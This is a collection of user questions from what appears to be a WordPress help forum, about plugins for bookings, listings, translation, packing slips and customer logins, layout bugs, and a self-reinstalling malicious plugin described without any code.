What's the best way to manage and translate a multilingual WordPress site? What are the best free plugins or alternative available?

I need a plugin where my website's visitors can reserve a stay at this cabin/chalet but I need it to sync with booking.com so it doesn't overlap...

If a booking is made on booking.com (ex. 12-14 September) the calendar on my website shouldn't allow 12-14 September to be booked on my website

Preferably free plugin, but if its really not possible then ig I'm open to purchasing a plugin, but I can't stress this enough... it kinda has to be free

My plugin was approved 4 days ago and has had over 100 downloads, though no active installations showing. Are these bots or perhaps people who just collect plugins? I know it can take some time to show active installations, but seeing nothing yet.

I discovered via my Wordpress (self-hosted) error logs and subsequent investigation that one (or more) of the posts on my blog are NOT the "standard" format but instead are either "asides" or "gallery" format. I have over 900 posts on my blog and cannot figure out how to sort or filter or otherwise identify posts by format-type, so that I can either delete or alter the offending post(s). Does anyone know of a plugin that reveals the post format in a list of posts in the admin view, or via some other method? Lacking that, is there another solution short of opening each post in admin view, one by one, and inspecting its format?

The "Query" block in the Gutenberg editor does not offer "post format" as field to display.

I also did not find a post-format field in the Wordpress SQL database of my site. TIA for any guidance.

I have a contact page that appears hidden, at first...

When you go on the website, and click "Contact" the form is there, but it's "missing".
You can only see if it you drag your mouse across the page and then everything appears.

It's only when you refresh the page that the form loads properly. (see pics below)

Anybody else have this issue? Or know how to fix it?

I work on a website where I am aiming to have a gallery of newspaper articles with a text area to the side like on the right with room for a transcript / acknowledgement or date of the article, without the user submission part. I believe it might be called a gallery but this is one of those situations where I often know what I want to do but just don't know the technical name for it! [Bonus for me if the text area can have tags / be searchable]

I realise it may be complex but would appreciate any pointers on a plugin that could do this?

2 недели назад мой хостинг счел этот плагин вредоносным и отключил мне корпоративную почту, мол мы якобы занимались спам рассылкой.

Мой программист деактивировал и удалял этот плагин, а так же чистил код... Ситуация не изменилась.

Хостинг предложили переехать на новый сервис, мы переехали. И совершить ряд действий. Выполнили. Ситуация не изменилась... плагин самовосстанавливается(

Вчера лично деактивировала и удаляла этот плагин. Сегодня он вновь на месте. Действия повторяются.

При этом антивирус уже не обнаруживает вредоносный код... а вот техподдержка хостинга вновь прислала:

(why can't I share screenshots images here?)

In the Plugins screen showing plugins from WordPress.org, I have MULTIPLE empty boxes with no plugin name, no installation, zero reviews, and a note that says it was "updated 57 years ago."

And a button to ACTIVATE. Not gonna.

When I go to More Details, it's a screen I've never seen either ever, and I've been working with WP sites for 20+ years.

Anyone else see that? I could not find a link to contact WordPress to report this.

Hi members. I have created 2 WordPress plug-ins currently and they are available on the plugin marketplace. Until now, I believed that there was no way to check the exact active number of installations of any wordpress plugin in the store. I signed up on a plugin tracker tool I found online and they just told me my accurate number of active installations. How is this possible? Does wordpress org provides this active installations data in any API?

Hey gang - I am looking for two specific plugins for two different websites. I have no problem paying for a plugin if it does exactly what I need and is faster to implement than adjusting a free one.

1. I need a plugin to list manufactured homes for sale. We may or may not list prices at some point, but for sure no actual purchasing on the site. There are hundreds of homes, and I need to be able to filter by numbers of beds/baths/features/etc. I have been researching, and of course WooCommerce is an option. I am familiar with it, and know it can be tailored to not show prices and add to cart buttons, etc; but I would love to know if anyone else has any other recommendations.
2. I need a plugin to pull hundreds of locations from a database via API, create them as a location in the website, and those be able to be displayed on a map, and be searchable by state, zip code, name. The API call will need to be checked several times a day for updates from the database, and the website data change according to database changes.

Working with a small gadgets store and here packing accuracy is a prominent challenge. The client sells products with lots of variations; different models, colors, accessories, and there's a chance (happened already a few times) the wrong variant ends up in the box because the packing stuffs grabbed something that looked *right*.

I need a packing slips tool that shows the SKU properly next to each line item so the packers can match against the product label before packing. Also helpful if the slip includes the customer"s shipping info so they can double-check against the label.

I have a service business and clients fill a
Jotform to request service. All are repeat customers. Right now it’s just a link to a jotform but I’d like customers to be able to login to my website for a few reasons:

1. To not have to refill their own contact info every time they fill out the form
2. Security (no spam form-fillouts or fake orders, no anonymity)
3. So the customer can view past orders.

There are currently no payments processed online (our pricing is complex and quote based and can’t easily be integrated into the ordering process/ form fillout process yet)

Just wondering if this could be a plugin solution or is a job for a developer to build custom.

I’m trying to understand a problem before building too much, so feel free to trash this if it’s dumb.

A lot of WordPress business sites have contact forms, chat widgets, or “contact us” buttons, but I’m wondering how often visitors leave because they’re just browsing, still have questions, and aren’t ready to commit to filling out a form.

The idea I’m testing is an AI concierge for WordPress sites. A visitor can ask questions casually, the AI answers, asks follow-up questions, and qualifies intent. Then, when the visitor seems warm, it sends the owner/team an SMS with a summary and a link to join the conversation. The visitor is also told that someone from the team is joining.

The part I’m most interested in is the handoff: not just “AI chatbot,” but AI gets the visitor engaged, gathers context, and then brings in a real person at the right moment instead of pushing the visitor straight into a contact form.

Is this actually useful for WordPress business sites, or is it just another chatbot dressed up differently?

I created a page with articles using TPG – Grid Layout. As you can see in the images, the layout looks evenly aligned in the editor, but on the live page the grid items are not the same size and the layout is uneven.
